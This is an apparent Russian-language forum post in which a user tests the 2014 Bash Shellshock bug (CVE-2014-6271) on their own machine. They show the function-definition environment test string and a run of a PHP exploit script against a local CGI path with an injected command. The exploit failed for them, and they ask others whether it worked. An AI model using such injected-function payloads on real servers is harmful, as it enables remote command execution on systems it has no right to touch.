Собственно, сабж. Уязвимости 22 года http://thehackernews.com/2014/09/bash-shell-vulnerability-shellshock.html http://seclists.org/oss-sec/2014/q3/649
Наконец нашел время на потестировать. Сполйт так и не заработал у меня. Хотя баш у меня уявзим. У кого то заработало? Code: [andry@localhost exp]$ x='() { echo «hi mom»; };echo «hi bro»' bash -c 'echo bye dad' «hi bro» bye dad [andry@localhost exp]$ ls /tmp |grep lala [andry@localhost exp]$ php Bash-CVE-2014-6271.php -u http://localhost/cgi-bin/1.cgi -c "ls -la > /tmp/lalala.txt" Command sent to the server! [andry@localhost exp]$ ls /tmp |grep lala [andry@localhost exp]$ Правда в КДЕ вылетает в ABRT следующее: PHP: bash сбой Process /usr/bin/bash was killed by signal 11 (SIGSEGV)